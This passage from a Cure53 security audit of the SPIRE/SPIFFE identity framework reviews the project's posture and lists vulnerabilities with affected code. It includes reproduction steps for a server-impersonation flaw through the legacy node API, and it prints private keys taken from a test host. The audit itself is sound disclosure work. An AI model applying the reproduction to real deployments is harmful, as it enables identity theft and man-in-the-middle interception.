for verifying JWT-SVID\ntokens or TLS certificate generation, as well as in the realm of correct URI parsing for\nSPIFFE IDs. All in all, the process of unit-testing and its importance is well-understood at\nSPIRE. There is high expectation that this approach continues throughout development\nin the future.\n4https://github.com/spiffe/spire/blob/master/doc/telemetry.md 5https://github.com/spiffe/spire/commit/1e5cda99b7d0934908d37dd2e27f039b479d8d4c 6https://github.com/spiffe/spire/pull/577 \nCure53, Berlin \u00b7 02/10/21 10/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nDocumentation\nGood documentation contributes greatly to the overall state of the project. It can ease\nthe workflow and ensure final quality of the code. For example, having a coding\nguideline which is strictly enforced during the patch review process ensures that the\ncode is readable and can be easily understood by various developers. Following good\nconventions can also reduce the risk of introducing bugs and vulnerabilities to the code.\nThe overall quality of the documentation of SPIFFE/SPIRE is praiseworthy. It contains\nevery information that is necessary to understand the overall concept of the architecture,\nhow to deploy it and how to use it. It is structured in a way that step-wise guides help the\nuser to first learn about SPIRE's design and goals, and then explain how to set up\nagents and servers, for example in regard to Kubernetes clusters. Each step gets a\ndedicated section in the documentation, inclusive of extensive guides about\nconfigurational details and scaling the architecture throughout multiple trust domains.\nThe content does not leave much room for questions and underlines the overall maturity\nof the software and its concept. Apart from the linked CONTRIBUTING.md inside the\nGitHub page, the documentation additionally contains a guideline on extending SPIRE,\nmostly for the different plugin systems it supports. It appropriately advises caution when\nusing third-party plugin code. Extra sections on how to interact with workload APIs is\nalso offered.\nWhat might be a little confusing for some is that documentation pages inside the GitHub\nrepository under https://github.com/spiffe/spire/tree/master/doc do not entirely match the\nofficial one. The former often provides a little more detail on certain components of the\nSPIRE architecture. Given that the doc pages on GitHub are regularly updated, it should\nbe considered to sync them with the official documentation more properly.\nOrganization/Team/Infrastructure Specifics\nThis section will describe the areas Cure53 looked at to learn more about the security\nqualities of the SPIRE project that cannot be linked to the code and software but rather\nencompass handling of incidents. As such, it tackles the level of preparedness for critical\nbug reports within the SPIRE development team. In addition, Cure53 also investigated\nthe levels of community involvement, i.e. through the use of bug bounty programs. While\na good level of code quality is paramount for a good security posture, the processes and\nimplementations around it can also make a difference in the final assessment of the\nsecurity posture.\nCure53, Berlin \u00b7 02/10/21 11/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nSecurity Contact\nTo ensure a secure and responsible disclosure of security vulnerabilities, it is important\nto have a dedicated point of contact. This person/team should be known, meaning that\nall necessary information - such as an email address and preferably also encryption\nkeys of that contact - should be communicated appropriately.\nSPIFFE/SPIRE mentions a security contact multiple times in their GitHub repository. The\nSECURITY.md and the CONTRIBUTING.md as well as the README.md contain a\nsmall section on where to report security vulnerabilities to. Except for the email address,\nno guidelines on the report format or further details are provided. The sections\nadditionally lack a PGP key which would be beneficial for more severe vulnerability\nreports. Additionally, the official documentation lacks further mention of a security\ncontact. The mentioned email address is not found outside of the GitHub repository.\nSince many developers and users start with the documentation under https://spiffe.io/, a\ndedicated section about a security contact might be helpful there as well.\nSecurity Fix Handling\nWhen fixing vulnerabilities in a public repository, it should not be obvious that a particular\ncommit addresses a security issue. Moreover, the commit message should not give a\ndetailed explanation of the issue. This would allow an attacker to construct an exploit\nbased on the patch and the provided commit message prior to the public disclosure of\nthe vulnerability. This means that there is a window of opportunity for attackers between\npublic disclosure and wide-spread patching or updating of vulnerable systems.\nAdditionally, as part of the public disclosure process, a system should be in place to\nnotify users about fixed vulnerabilities.\nWalking through the commit log, SPIRE and go-spiffe-v2 did not receive fixes for\nvulnerability reports so far. The only exception here is a security fix that would mean that\nattackers with read log-files access could obtain JWT-SVIDs7. This is transparently\nexplained and even highlights the faulty commit that introduced this issue. Still, at the\ntime of writing, there is no real sample set to judge the handling of security fixes. At the\nsame time, SPIRE transparently highlighted security impact of version changes that\nhappened whenever security issues in important libraries were disclosed. There are a\nfew examples - such as issue #6908 or issue #12049 - that fix vulnerabilities in Golang\nand where the commit log mentions the appropriate CVE to highlight what problems the\nfix mitigates.\n7https://github.com/spiffe/spire/pull/1953 8https://github.com/spiffe/spire/pull/690 9https://github.com/spiffe/spire/pull/1204 \nCure53, Berlin \u00b7 02/10/21 12/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nBug Bounty\nHaving a bug bounty program acts as a great incentive in rewarding researchers and\ngetting them interested in projects. Especially for large and complex projects that require\na lot of time to get familiar with the codebase, bug bounties work on the basis of the\npotential reward for efforts.\nThe SPIRE project does not have a bug bounty program at present, however this should\nnot be strictly viewed in a negative way. This is because bug bounty programs require\nadditional resources and management, which are not always a given for all projects.\nHowever, if resources become available, establishing a bug bounty program for SPIRE\nshould be considered. It is believed that such a program could provide a lot of value to\nthe project.\nBug Tracking & Review Process\nA system for tracking bug reports or issues is essential for prioritizing and delegating\nwork. Additionally, having a review process ensures that no unintentional code, possibly\nmalicious code, is introduced into the codebase. This makes good tracking and review\ninto two core characteristics of a healthy codebase.\nSPIRE\u2019s readme page10 explains that bugs should be filed via the GitHub\u2019s issue tracker.\nThere is no exact guideline or template on how to report bugs, leading to a rather messy\nreport system that makes it harder to distinguish between valid concerns and generic\nfeature requests.\nApart from that, contributions can be made through pull requests on GitHub. This is\nthoroughly explained in the CONTRIBUTING.md11 file where the required coding\nconventions and review process are described. Each pull request needs to be approved\nby one or two maintainers to make sure all changes comply with the required standards,\nin turn preventing submission of malicious or dysfunctional code.\nEvaluating the Overall Posture\nChoosing the Go programming language for the majority of code in this project has been\na good decision and almost automatically reduces the potential for introducing memory-\nsafety-related issues. Additionally, the excellent documentation along with the well-\ndocumented processes for patches and contributions further reduce the risk of security\nvulnerabilities being handled badly or remaining undetected.\n10https://github.com/spiffe/spire#contribute-to-spire 11https://github.com/spiffe/spiffe/blob/master/CONTRIBUTING.md \nCure53, Berlin \u00b7 02/10/21 13/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nNote that a dedicated section in the publicly available documentation material also lists\nthe security audits and assessments that have already been carried out in the past, prior\nto Cure53\u2019s thorough posture review and code audit12. A topic worth-mentioning is that of\na bug bounty program, although it is understandable that smaller projects are likely\nunable to secure funds for these. However, with future growth of the project and\npotentially increased resources, a bug bounty scheme should definitely be considered.\nFurther, some concerns were raised and documented regarding the configurability and\nthe high-level of flexibility being a possible venue for mistakes and resulting\nvulnerabilities in rolled-out deployments. Two issues were raised here, hinting towards a\nmore security-aware documentation of the configuration options for additional safety.\nPhase 2: Manual code auditing & pentesting\nThis section comments on the code auditing coverage within areas of special interest\nand documents the steps undertaken during the second phase of the audit against the\nSPIRE software complex.\n\u2022While inspecting the JWT-SVID related parts, it was checked if SPIRE properly\npermits and enforces the algorithms set by the specification and enforces a\nsingle header.\n\u2022Relating to the server GRPC implementation, it was checked whether the agent\nauthentication requires a valid and signed certificate with agent attestation, with\nspecial look at various plugins that make attestation obtainable.\n\u2022In the realm of authorization, diverse checks were executed against the\nAuthorizeAnyOf, lolcaOrAdmin and downStream implementations. Special\nattention was paid to the certificate check in the Node authz/authn parts, where a\nmissing check for the expiration of the certificate in the registration API was\nspotted.\n\u2022Further checks were executed against the spire-agent and spire-server binaries\nrunning on the provided test-systems using checksec (verifying binary protection\nflags); a low severity finding was spotted here and filed as SPI-01-001.\n\u2022It was examined whether any outdated or vulnerable third-party software\ndependencies affect SPIRe, for instance linking against gorm v1.9.9 which is\nvulnerable to an SQLi that was fixed in software version v1.9.10.\n\u2022The team also looked at the user-permissions the spire-agent and spire-server\nare running with. It has to be noted that the customer confirmed that the spire-\nagent was running with root privileges due to the deployment setup that has been\nprovided, whereas - in real-world scenarios - the spire-agent must not\nnecessarily run with root privileges.\n12https://github.com/spiffe/spire#security-assessments \nCure53, Berlin \u00b7 02/10/21 14/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n\u2022Further inspected features included the datastore cache ( dscache) of the SPIRE\nserver and its locking mechanism using mutexes, as well as the entry cache\nused for caching registration entries of agents of the SPIRE server and similar\nprocesses. No issues have been spotted here.\n\u2022Checks were executed against the Trust Bundle Bootstrapping performed by the\nSPIRE agent for establishing the initial trust. No issues were spotted here.\n\u2022Multiple checks were executed against the SPIRE Workload API. The unix\ndomain socket was found to have permissions of 0777, meaning anyone on the\nsystem running the spire-agent can connect() to the socket and interact with it.\n\u2022The developers are also aware that the workload API socket is completely\nunauthenticated.\n\u2022The workload API was found to have no rate-limiting implemented; the\ndevelopers are aware of the potential risk of a malicious workload attempting to\nDoS the agent (assuming discover_workload_path is set to true) by enforcing the\nagent to calculate the sha256 checksum of very large binaries during attestation.\n\u2022Workload attestation is a crucial component of SPIRE and any ways of\nsubverting workload attestation could result in stealing identities of neighboring\nworkloads. No issues were spotted in this area.\n\u2022Special attention was given to the implementation of the JWT token verification\nthe software in scope performs; no issues were spotted though.\n\u2022The team also inspected the implementation of the node attestators for the\nagent. Node attestation is best being performed on a case-by-case basis, e.g.\nleveraging AWS or GCP-based node attestation implies that the computing\nplatform is assumed to be trustworthy, and leveraging Kubernetes for workload\nattestation implies that the Kubernetes deployment is assumed to be trustworthy.\n\u2022The join_token is responsible for attesting the agent's identity using a one-time-\nuse pre-shared key. Here, the team checked the generation of the Join token,\nwhich is using uuid.newV4(). Its validation on the SPIRE server-side was also\nreviewed.\n\u2022Further checks in this realm included auditing of the code for potential integer\noverflows / underflows as well as potential race condition vulnerabilities and\nTOCTOU issues. No discoveries were made.\n\u2022Audits were also performed against the peertracker, with a particular focus on\nLinux. One potential file descriptor leak results in a Denial-of-Service situation\ndescribed in SPI-01-006.\n\u2022Cure53 paid attention to the active-active setup between granola-regional-1 and\ngranola-regional-2. Both server instances have the same datastore settings and\nserver configurations. Such a setup is solely achieved through the configuration\nof all servers in the same trust domain to read and write to the same shared\ndatastore. One of the goals of reviewing such an active-active setup was to\nCure53, Berlin \u00b7 02/10/21 15/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nidentify potential attacks that should only be performed once and how an active-\nactive cluster mitigates the risk of an attacker racing in such scenarios.\n\u2022The upstream authority setup between granola-regional-1, granola-regional-2\nand granola-global has been reviewed but no issues have been identified.\n\u2022The team also looked into go-spiffe\u2019s particulars in terms of fetching and\nvalidating SVID\u2019s, but no issues worth-reporting have been spotted.\n\u2022Finally, checks were also performed against the Federation features, but no ways\nof subverting the federation relationship have been spotted.\nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. SPI-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nSPI-01-003 WP2: Path normalization in Spiffe ID allows impersonation (Medium)\nIt was found that the SPIRE implementation applies unspecified, undocumented and\ninconsistent path normalization when parsing or constructing the Spiffe ID. The path\nnormalization is occasionally applied by SPIRE and was adopted from the filesystem\nwith respect to anomalies like the current (./) or parent (../) directory.\nThis allows adversaries to launch a path traversal attack when user-supplied data is\nembedded within the path part of the Spiffe ID. This path traversal attack can be\ncombined with encoded URL entities that are inconsistently decoded. This allows for\nseveral bypasses of security checks and could lead to the misidentification or\nimpersonation of another node, agent or server.\nAffected File:\nsupport/k8s/k8s-workload-registrar/mode-reconcile/controllers/pod_controller.go\nAffected Code:\nfunc (r *PodReconciler) makeSpiffeIDForPod(pod *corev1.Pod) *spiretypes.SPIFFEID\n{\n var spiffeID *spiretypes.SPIFFEID\n switch r.Mode {\n case PodReconcilerModeServiceAccount:\n spiffeID = r.makeID( path.Join(\"/ns\", pod.Namespace, \"sa\", \npod.Spec.ServiceAccountName) )\n case PodReconcilerModeLabel:\nCure53, Berlin \u00b7 02/10/21 16/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n if val, ok := pod.GetLabels()[r.Value]; ok:\n spiffeID = r.makeID( path.Join(\"/\", val) )\n case PodReconcilerModeAnnotation:\n if val, ok := pod.GetAnnotations()[r.Value]; ok:\n spiffeID = r.makeID( path.Join(\"/\", val) )\n }\n return spiffeID\n}\nThe Kubernetes workload registrar can be configured to use the value of a Kubernetes-\nspecific pod label. If the value of this pod label is partially or fully attacker-controlled, the\npath normalization applied by path.Join can be used to specify an arbitrary identity. A\nsimilar approach was used for some node attestator plugins, allowing to configure the\ntemplate for the attested Spiffe ID to include potentially user-controlled data, such as the\nAWS instance tags, prior to path normalization.\nAffected File:\npkg/common/idutil/spiffeid.go\nAffected Code:\nfunc AgentURI(trustDomain, p string) *url.URL {\n return &url.URL{\n Scheme: \"spiffe\",\n Host: trustDomain,\n Path: path.Join(\"spire\", \"agent\", p) ,\n }\n}\nAttackers could occasionally use URL encoding to the path traversal attack as the path\nof a Spiffe ID are sometimes URL-decoded by Spiffe with the Parse function of Go\u2019s\nbuilt-in url package.\nAffected File:\npkg/common/idutil/spiffeid.go\nAffected Code:\nfunc ParseSpiffeID(spiffeID string, mode ValidationMode) (*url.URL, error) {\n u, err := url.Parse(spiffeID)\n [...]\n return normalizeSpiffeIDURL(u), nil\n}\nCure53, Berlin \u00b7 02/10/21 17/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nThe Spiffe specification leaves the interpretation of the path of a Spiffe ID to the\nadministrator. On the one hand, specifying the Spiffe ID as an URL comes with the\ncomfort and rich presence of many parsers that can be used from all languages. On the\nother hand, this diversity pairs tightly with differences in the URL parsing, path and\ncharacter normalization. This can be a covert security pitfall when the verifier or the\nissuer treats two distinct entities with ambiguous identities.\nIt is recommended to mention within the Spiffe specification that the interpretation of the\nSpiffe ID MUST be consistent across all workloads, agents and servers, especially those\nincluding any path normalization like URL decoding, Path Normalization or Unicode\nNormalization. This could be supported by supplying a reference/default interpretation\nand, perhaps, supplemented with an implementation of parsing the Spiffe-ID in multiple\nlanguages.\nSPI-01-004 WP2: Server impersonation through legacy node API (High)\nIt was found that the legacy node API suffers from a logical flaw that allows malicious\nagents to request and receive a x509 peer certificate for other workloads, agents or\nservers within the same trust domain. The handler of the FetchX509SVID method\noffered by the server's legacy gRPC node API does not properly validate the Spiffe ID\nbut only validates the entry ID associated with certificate signing requests received from\nauthenticated agents.\nThis handling signifies the risk of malicious or compromised agents performing identity\ntheft or impersonation attacks against any peers of the trust domain. The issue could be\nabused to perform Man-in-the-Middle (MitM) attacks intercepting sensitive information.\nAffected File:\npkg/server/endpoints/node/handler.go\nAffected Code:\nfunc (h *Handler) buildSVID(ctx context.Context, id string, csr *CSR, regEntries\nmap[string]*common.RegistrationEntry) (*node.X509SVID, error) {\n entry, ok := regEntries[id]\n if !ok {\n [...]\n return nil, errors.New(\"not entitled to sign CSR for given ID type\")\n }\n svid, err := h.c.ServerCA.SignX509SVID(ctx, ca.X509SVIDParams{\n SpiffeID: csr.SpiffeID,\n PublicKey: csr.PublicKey,\n TTL: time.Duration(entry.Ttl) * time.Second,\n DNSList: entry.DnsNames,\nCure53, Berlin \u00b7 02/10/21 18/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n })\nLog File Excerpt:\nJan 24 13:24:52 granola-regional-2 spire-server[1212]: ... msg=\"This API is \ndeprecated and will be removed in a future release\" method= /spire.api.node.Node/\nFetchX509SVID subsystem_name=api\nJan 24 13:24:52 granola-regional-2 spire-server[1212]: ... msg=\" Signing SVID\" \naddress=\"54.184.34.192:56706\" \ncaller_id=\"spiffe://granola-co/spire/agent/aws_iid/006101183245/us-west-2/i-\n00a447038625dd336\" spiffe_id=\" spiffe://granola-co/spire/server \" \nsubsystem_name=node_api\nJan 24 13:24:52 granola-regional-2 spire-server[1212]: ... msg=\" Signed X509 \nSVID\" expiration=\"2021-01-24T14:24:52Z\" \nspiffe_id=\"spiffe://granola-co/spire/server \" subsystem_name=ca\nReproduction Steps:\n1.Receive the entryID of a workload for a targeted spire-agent\n2.Build the modified spire-agent via make\n3.Run the modified spire-agent via CLI as follows:\n\u25e6spire-agent fetchx509 \n \n4.For instance, use the following command as root from granola-workload:\n\u25e6spire-agent fetchx509 'granola-co.spiffe.me:8081' 'spiffe://granola-\nco/spire/server' '7de77de9-6897-4f0f-917d-45de852dc2ee' \n/etc/spire/.data\n5.The response of the gRPC request will now be printed. If successful, it will\ncontain the signed x509 certificate. Additionally, the log file of the spire-server will\nmatch the excerpt from above.\nThe Spiffe ID of the certificate signing request should be confirmed to match the Spiffe\nID of the registration entry that is identified by the entry ID supplied by the agent.\nAlternatively, support for the legacy node API could be dropped, mitigating this\nvulnerability in full.\nSPI-01-006 WP1: File-descriptor leak inside Linux peertracker (Medium)\nDuring a review of the workload API, it was noticed that the spire-agent keeps track of\nworkload processes by having open file descriptors of the workload\u2019s process\n/proc/ entry. Under specific circumstances, the function newLinuxWatcher() does\nnot add the opened file descriptor to the returned linuxWatcher object.\nThis can, for example, occur whenever the function getStarttime(), invoked by\nnewLinuxWatcher() , returns an error message. An attacker could leverage this flaw and\ncause the agent\u2019s peertracker to exercise this code path many, many times. Hitting the\nCure53, Berlin \u00b7 02/10/21 19/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nmaximum open file limit set by the Linux operating system would result in DoS. It has to\nbe noted that this value is configurable and potentially different on different Linux\nsystems, however, the provided test-servers had the limit of open file handles per\nprocess set to 1024.\nAffected File:\nspire/pkg/common/peertracker/tracker_linux.go\nAffected Code:\nfunc newLinuxWatcher(info CallerInfo) (*linuxWatcher, error) {\n// If PID == 0, something is wrong...\nif info.PID == 0 {\nreturn nil, errors.New(\"could not resolve caller information\")\n}\nprocPath := fmt.Sprintf(\"/proc/%v\", info.PID)\n// Grab a handle to proc first since that's the fastest thing we can \ndo\nprocfd, err := syscall.Open(procPath, syscall.O_RDONLY, 0)\nif err != nil {\nreturn nil, fmt.Errorf(\"could not open caller's proc directory:\n%v\", err)\n}\nstarttime, err := getStarttime(info.PID)\nif err != nil {\nreturn nil, err\n}\nreturn &linuxWatcher{\ngid: info.GID,\npid: info.PID,\nprocPath: procPath,\nprocfd: procfd ,\nstarttime: starttime,\nuid: info.UID,\n}, nil\n}\nIt is important to properly keep track of open file descriptors. Cure53 recommends\nclosing the opened file handle whenever getstarttime() fails, in order to eliminate the risk\nof DoS.\nCure53, Berlin \u00b7 02/10/21 20/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nSPI-01-001 WP1: Build-system lacks security flags (Low)\nWhile checking the properties of the compiled spire-agent and spire-server binaries, it\nhas been identified that the resulting binaries do not have the compiler time security\nhardening flags enabled. The following security hardening options - applicable and\nexecutable - are missing:\n\u2022PIE (spire-agent and spire-server)\n\u2022RELRO (spire-agent and spire-server)\n\u2022Stack Canaries / Stack-Smashing Protection (spire-agent)\n\u2022FORTIFY_SOURCE (spire-agent)\nA detailed description of the referred security hardening compiler flags can be found\nonline13.\nShell excerpt:\nThe following PoC demonstrates the lack of compile time security hardening flags by\nusing the checksec.sh14 utility on two of the provided server systems.\n34.214.21.89 (granola-global - Root Server)\nroot@granola-global:/home/ubuntu/tmp/checksec.sh# ./checksec --proc-all\n[...]\nCOMMAND PID RELRO STACK CANARY SECCOMP NX/PaX PIE FORTIFY\n[...]\n-server 450 Partial RELRO Canary found No Seccomp NX enabled No PIE Yes\n[...]\n54.149.236.250 (granola-regional-1 - Nested Server)\nroot@granola-regional-1:/home/ubuntu/tmp/checksec.sh# ./checksec --proc-all\n[...]\nCOMMAND PID RELRO STACK CANARY SECCOMP NX/PaX PIE FORTIFY\n[...]\n-agent 446 No RELRO No canary found No Seccomp NX enabled No PIE No\n-server 449 Partial RELRO Canary found No Seccomp NX enabled No PIE Yes\n[...]\n13https://wiki.archlinux.org/index.php/Arch_package_guidelines/Security#Golang 14https://github.com/slimm609/checksec.sh \nCure53, Berlin \u00b7 02/10/21 21/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nCure53 encourages the use of all existing compiler security features in order to raise the\nbar for attackers who aim to exploit vulnerabilities within SPIRE. The missing features\ncan be enabled by incorporating the following flags in the build-system:\nexport GOFLAGS='-buildmode=pie'\nexport CGO_CPPFLAGS=\"-D_FORTIFY_SOURCE=2\"\nexport CGO_LDFLAGS=\"-Wl,-z,relro,-z,now\"\nexport CGO_LDFLAGS='-fstack-protector'\nSPI-01-002 WP1: SPIRE server stores private key.json world-accessible (Medium)\nDuring an audit of the spire-server-related source code, it was noticed that the key.json\nfile, holding sensitive information such as JWT-Signer and x509-CA private keys, is\nopened and stored with file permissions 0644.\nThis insecure default file permissions grants read permissions to anyone. It is important\nto note that the configured umask of the Linux system, where the spire-server binary is\ninvoked, gets applied when creating the referred key.json file. Thus, the actual file\npermissions strongly depend on the configured umask value.\nAffected File:\nspire/pkg/server/plugin/keymanager/disk/disk.go\nAffected Code:\nfunc writeEntries(path string, entries []*base.KeyEntry) error {\ndata := &entriesData{\nKeys: make(map[string][]byte),\n}\nfor _, entry := range entries {\nkeyBytes, err := x509.MarshalPKCS8PrivateKey(entry.PrivateKey)\nif err != nil {\nreturn err\n}\ndata.Keys[entry.Id] = keyBytes\n}\njsonBytes, err := json.MarshalIndent(data, \"\", \"\\t\")\nif err != nil {\nreturn newError(\"unable to marshal entries: %v\", err)\n}\nif err := diskutil.AtomicWriteFile(path, jsonBytes, 0644) ; err != nil {\nreturn newError(\"unable to write entries: %v\", err)\n}\nCure53, Berlin \u00b7 02/10/21 22/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nreturn nil\n}\nThe following output was captured on the granola-local host and shows that sensitive\ninformation is stored within the referred keys.json file.\nShell excerpt:\nroot@granola-global:/etc/spire# cat keys.json\n{\n\"keys\": {\n\"JWT-Signer-A\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgnHN6i3MmltAFIunvAfFCGm65d0sxBOt\nXhny6gqf4xQqhRANCAAQ+u3j23JuqxnRHiuWjhuQ1cItJFluxRjTm+HVXENeq6KAX3QgqpxkarVuG+SZ\njS0A0TzoqJHd1M7yMvdD+zR19\",\n\"JWT-Signer-B\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgt9/m9kbtMmFmTNSVX1OukhId2B3fBIs\nFIKTPs4tUiiqhRANCAAQHP6raGmLbnrIQp5FzRSFTrVSEEbLh3tgXSgIxokHYnb9bVK9mJa+rpUjMw7r\nl77w7CWhqRKjEvevBRvhVFPNd\",\n\"x509-CA-A\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgRKQFwCWb/cWN2XM0gkz9P9Rt7O7LeG4\n2eJ7Tm7x/tgWhRANCAASI/\nPl5gMAxim1iD0tn0ILvkwz7N5JuyqluIvM4MZ050g8bWsus47jtzzbHi6VT6Xp/\nyDLM8fmWQtXsrvBOgYyA\",\n\"x509-CA-B\": \n\"MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgHtk+zLvKi4gpH1ILq3ywafZ3i/\nc4HOez3HV7IoyCwBWhRANCAAQIEDGWWk/HgBDBA1gRcRH01B/\nV+pbNdQVp63RrGQ0PQ7P1+Q5ScSD38qs8S2eKmQ1o9/rFdFTjusWqgGF0A/ru\"\n}\nIn the example output depicted above, the configured umask on the provided granola-\nlocal host prevented read access of the keys.json file because of the restrictive umask\nsettings.\nSensitive information, such as private-keys, should never be stored with file permissions\n0644. 0600 should be used instead, only granting read and write permissions to the\nowner of the file.\nSPI-01-005 WP1: SPIRE links against outdated third-party modules (Medium)\nWhile reviewing all third-party dependencies that are linked within SPIRE-v0.12\u2019s\ncodebase, it was noticed that the go.mod file (the file that lists all dependency\nrequirements and their versions) contains a list of outdated modules. A few noteworthy\nmentions are enumerated in the list below.\nCure53, Berlin \u00b7 02/10/21 23/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nExcerpt with outdated modules:\n\u2022github.com/Azure/azure-sdk-for-go\n\u25e6Linked v44.0.0 instead of v50.1.0\n\u2022github.com/mattn/go-sqlite3\n\u25e6Linked v1.10.0 instead of v1.14.6\n\u2022github.com/sirupsen/logrus\n\u25e6Linked v1.4.2 instead of v1.7.0\n\u2022github.com/jinzhu/gorm\n\u25e6Linked v1.9.9 instead of v1.9.16\n\u2022etc\u2026\nEspecially newer versions of the mentioned gorm library contain fixes for one CVE15 that\nwas reported for versions below 1.9.10. Although the patch for this CVE was reverted at\nsome point (since it can be considered a non-issue), the current situation with the\ndependency management is not optimal. At present, especially security fixes that\nhappen during version changes will go unnoticed. This is also mentioned in the maturity\nsection in the beginning of this report where potential automated solutions are\nhighlighted. It is recommended to make sure that version changes for dependencies are\nincluded in the build process of SPIRE.\nSPI-01-007 WP1: Path traversal in Spiffe ID via potentially unsafe join token (Info)\nIt was found that the join token supplied by the user is then used for the attested Spiffe\nID. This could be dangerous if the datastore plugin cuts the join token16 or performs\nmutations on the join tokens before looking them up. This could be abused to bypass the\nallow-list and perform attacks similar to SPI-01-003.\nAffected File:\npkg/server/api/agent/v1/service.go\nAffected Code:\nfunc (s *Service) attestJoinToken(ctx context.Context, token string) \n(*nodeattestor.AttestResponse, error) {\n log := rpccontext.Logger(ctx).WithField(telemetry.NodeAttestorType, \n\"join_token\")\n resp, err := s.ds.FetchJoinToken(ctx, &datastore.FetchJoinTokenRequest{\n Token: token,\n })\n [...]\n15https://www.cvedetails.com/cve/CVE-2019-15562/ 16An example of a similar flaw in MySQL is illustrated here: \n https://mathiasbynens.be/notes/mysql-utf8mb4\nCure53, Berlin \u00b7 02/10/21 24/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n tokenPath := path.Join(\"spire\", \"agent\", \"join_token\", token)\nIt is recommended to use the join token returned by the datastore instead of using the\none sent by the agent. By doing so, implementation flaws of the datastore that cut the\njoin token at specific characters or internally before looking them up are mitigated by\ndesign.\nSPI-01-008 WP1: Anti-SSRF hardening not applied for SDS API (Info)\nIt was found that additional hardening gained through the anti-SSRF token is only\napplied to the workload API. This introduces the risk of software that runs on the\nworkload being prone to a non-blind SSRF vulnerability, potentially granting attackers\naccess to the unhardened Secret Discovery Service (SDS).\nAffected File:\npkg/agent/endpoints/middleware.go\nAffected Code:\nfunc verifySecurityHeader(ctx context.Context, fullMethod string) \n(context.Context, error) {\n if isWorkloadAPIMethod(fullMethod) && !hasSecurityHeader(ctx) {\n return nil, status.Error(codes.InvalidArgument, \"security header missing\nfrom request\")\n }\n return ctx, nil\n}\nIt is recommended to accept but consider this risk in the security section of the\ndocumentation pertinent to configuring SDS. Relevant endpoints of the workload API\nshould be listed to have the users additionally informed that the SDS API is unprotected\nagainst SSRF attacks.\nCure53, Berlin \u00b7 02/10/21 25/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nConclusions\nThis comprehensive report demonstrates that the SPIRE project, which is the SPIFFE\nRuntime Environment, has been created with security in mind. The involved members of\nthe Cure53 team, who were commissioned by CNCF to complete this broadly-scope\nsecurity examination in January 2021, could not find any severe (or Critical) security\nflaws within the SPIRE complex.\nDespite an in-depth review of various high impact components of SPIRE, the work\nasserted the maintenance of high security levels. The meanwhile pretty massive\ncodebase of SPIRE made a solid impression, clearly showcasing that the in-house\ndevelopers are aware of secure programming principles.\nThe choice of the programming language, GoLang, positively contributes to the general\nsecurity posture and reduces the exposure to risks. In addition, it eliminates some bug\nclasses significantly, as is the case with memory corruption issues and the likes often\nfound in C/C++. Cure53 must underline that the SPIRE workload attestation API is a\nvery interesting target for attackers, meaning that it should be protected with uttermost\nscrutiny. It was not possible to subvert the workload attestation process, however, one\npotential Denial-of-Service issue has been spotted ( SPI-01-006).\nThe examination revealed that the Go build process has not been taking full advantage\nof existing binary protection flags hardening, which exposes SPIFFE binaries to potential\nexploitation vectors ( SPI-01-001). Due to the provided setup, an audit of some platform\nspecific plugins, e.g. Kubernetes and docker workload attestation, was only possible\nfrom a static code analysis perspective. Considering the maturity of the SPIFFE/SPIRE\ndesign concept and its architecture, Cure53 was left with a very good impression on the\nwhole.\nTo reiterate, the codebase, together with its extensive documentation, is very clean,\nwell-structured and easy to follow. Despite the fact that there are some weaknesses\nhere and there, like outdated third-party libraries (see SPI-01-005), or lacking input\nvalidation (as in SPI-01-004), the overall quality of the whole project can be judged as\nquite mature.\nNote that issue SPI-01-004 presents an attractive attack-vector for attackers who wish to\nescalate the identity of a spire-agent into a spire-server. Its presence stresses the\nimportance of SPIRE's decision to 